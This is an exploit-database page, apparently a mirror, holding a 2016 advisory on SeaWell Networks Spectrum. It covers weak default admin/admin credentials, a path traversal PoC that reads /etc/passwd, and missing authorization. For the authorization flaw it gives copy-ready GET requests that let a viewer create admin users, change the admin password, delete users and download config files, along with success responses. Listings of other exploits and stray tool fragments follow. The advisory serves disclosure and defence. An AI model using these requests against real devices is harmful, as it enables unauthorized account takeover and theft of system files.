Menu

Search for hundreds of thousands of exploits

"SeaWell Networks Spectrum - Multiple Vulnerabilities"

Author

Exploit author

"Karn Ganeshen"

Platform

Exploit platform

php

Release date

Exploit published date

2016-01-18

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
# Exploit Title: [SeaWell Networks Spectrum - Multiple Vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.seawellnetworks.com/spectrum/]
# Versions Reported: [Spectrum SDC 02.05.00, Build 02.05.00.0016]
 
CVE-ID:
CVE-2015-8282
CVE-2015-8283
CVE-2015-8284

About SeaWell Networks Spectrum

Session Delivery Control

SeaWell set out to improve the way operators control, monetize and scale their IP video offerings, to meet the growing subscriber demands for video delivered to smartphones, tablets and game consoles.

The result  Spectrum  is what we call a Multiscreen 2.0 Session Delivery Controller.

Spectrum is high-performance, carrier-grade software that takes ABR video and repackages it  on-the-fly  into any other protocol, including Apple HLS, Adobe HDS, Microsoft Smooth Streaming and MPEG-DASH.

http://www.seawellnetworks.com/spectrum/

Affected version
Spectrum SDC 02.05.00
Build 02.05.00.0016
Copyright (c) 2015 SeaWell Networks Inc.

A. CWE-255: Credentials Management
CVE-2015-8282

Weak, default login credentials - admin / admin

B. CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
CVE-2015-8283

The configure_manage.php module accepts a file parameter which takes an unrestricted file path as input, allowing an attacker (non-admin, low- privileged user) to read arbitrary files on the system.

PoC:

https://IP/configure_manage.php?action=download_config&file=../../../../../../../../../etc/passwd

C. CWE-285: Improper Authorization
CVE-2015-8284

A low privileged, non-admin user, with only viewer privileges, can perform administrative functions, such as create, update, delete a user (including admin user), or access device's configuration files (policy.xml, cookie_config.xml, systemCfg.xml). The application lacks Authorization controls to restrict any non-admin users from performing admin functions.

The application users can have admin or viewer privilege levels. Admin has full access to the device. Viewer has access to very restricted functions.

It is possible for a viewer priv user to perform admin functions.

PoC:

Add new user [Admin function only]

GET /system_manage.php?username=viewer&password=viewer&password=viewer&userlevel=1&action=add_user&ekey=&LActiveRow= HTTP/1.1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

Here

admin -> userlevel=9
viewer -> userlevel=1

Create new user with Admin privs
Log in as viewer - try create new admin user - viewer1

https://IP/system_manage.php?username=viewer1&password=viewer&password=viewer&userlevel=9&action=add_user&ekey=&LActiveRow=

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Delete user

https://IP/system_manage.php?username=viewer1&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

Modify existing user (including admin)
log in as viewer - try change system (admin) user

https://IP/system_manage.php?username=system&password=&password=&userlevel=9&action=delete_user&ekey=4&LActiveRow=sys_Luser_4

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Change Admin password
log in as viewer - try change admin pass

https://IP/system_manage.php?username=admin&password=admin1&password=admin1&userlevel=9&action=update_user&ekey=3&LActiveRow=sys_Luser_3

<result><returnCode>0</returnCode><returnMsg>Success</returnMsg><loggedIn>1</loggedIn><payload/></result>

Downloading configuration xml files

viewer priv user has no access/option to config xmls via GUI. It is possible to download the configs by calling the url directly

Access policy config xml
https://IP/configure_manage.php?action=download_config&file=policy.xml

Access cookie config xml
https://IP/configure_manage.php?action=download_config&file=cookie_config.xml

Access system config xml
https://IP/configure_manage.php?action=download_config&file=systemCfg.xml

+++++
-- 
Best Regards,
Karn Ganeshen
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Simple College Website 1.0 - 'page' Local File Inclusion" webapps php Mosaaed
2020-12-02 "WordPress Plugin Wp-FileManager 6.8 - RCE" webapps php "Mansoor R"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - Password Reset leading to Account Takeover" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - 'Menu' Persistent Cross-Site Scripting" webapps php "Hemant Patidar"
2020-12-02 "Car Rental Management System 1.0 - SQL Injection / Local File include" webapps php Mosaaed
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "WonderCMS 3.1.3 - Authenticated SSRF to Remote Remote Code Execution" webapps php zetc0de
2020-12-02 "WonderCMS 3.1.3 - Authenticated Remote Code Execution" webapps php zetc0de
2020-12-02 "Pharmacy Store Management System 1.0 - 'id' SQL Injection" webapps php "Aydın Baran Ertemir"
2020-12-01 "Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS" webapps php yunaranyancat
Release Date Title Type Platform Author
2016-08-01 "Halliburton LogView Pro 9.7.5 - '.cgm' / '.tif' / '.tiff' / '.tifh' Crash (PoC)" dos windows "Karn Ganeshen"
2016-07-29 "mySCADAPro 7 - Local Privilege Escalation" local windows "Karn Ganeshen"
2016-07-25 "Mediacoder 0.8.43.5852 - '.m3u' (SEH)" local windows "Karn Ganeshen"
2016-07-25 "CoolPlayer+ Portable 2.19.6 - '.m3u' File Stack Overflow (Egghunter + ASLR Bypass)" local windows "Karn Ganeshen"
2016-07-21 "TFTP Server 1.4 - 'WRQ' Remote Buffer Overflow (Egghunter)" remote windows "Karn Ganeshen"
2016-07-06 "CIMA DocuClass ECM - Multiple Vulnerabilities" webapps php "Karn Ganeshen"
2016-05-17 "Meteocontrol WEB’log - Admin Password Disclosure (Metasploit)" webapps multiple "Karn Ganeshen"
2016-03-03 "Schneider Electric SBO / AS - Multiple Vulnerabilities" remote hardware "Karn Ganeshen"
2016-02-04 "GE Industrial Solutions UPS SNMP Adapter < 4.8 - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2016-02-04 "D-Link DVG­N5402SP - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2016-01-18 "SeaWell Networks Spectrum - Multiple Vulnerabilities" webapps php "Karn Ganeshen"
2015-11-20 "ZTE ADSL ZXV10 W300 Modems - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-11-20 "Cambium ePMP 1000 - Multiple Vulnerabilities" webapps cgi "Karn Ganeshen"
2015-11-20 "ZTE ZXHN H108N R1A / ZXV10 W300 Routers - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-15 "netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-15 "PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-14 "ZYXEL PMG5318-B20A - OS Command Injection" webapps hardware "Karn Ganeshen"
2015-10-13 "F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal" webapps hardware "Karn Ganeshen"
2015-10-13 "NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities" webapps hardware "Karn Ganeshen"
2015-10-01 "PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities" remote hardware "Karn Ganeshen"
2010-07-17 "EasyFTP Server 1.7.0.11 - 'MKD' (Authenticated) Remote Buffer Overflow" remote windows "Karn Ganeshen"
2010-07-17 "EasyFTP Server 1.7.0.11 - 'LIST' (Authenticated) Remote Buffer Overflow" remote windows "Karn Ganeshen"
2010-02-04 "Sterlite SAM300 AX Router - 'Stat_Radio' Cross-Site Scripting" remote hardware "Karn Ganeshen"
2009-06-28 "Google Chrome 2.0.172 - 'chrome://history/' URI Cross-Site Scripting" remote multiple "Karn Ganeshen" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected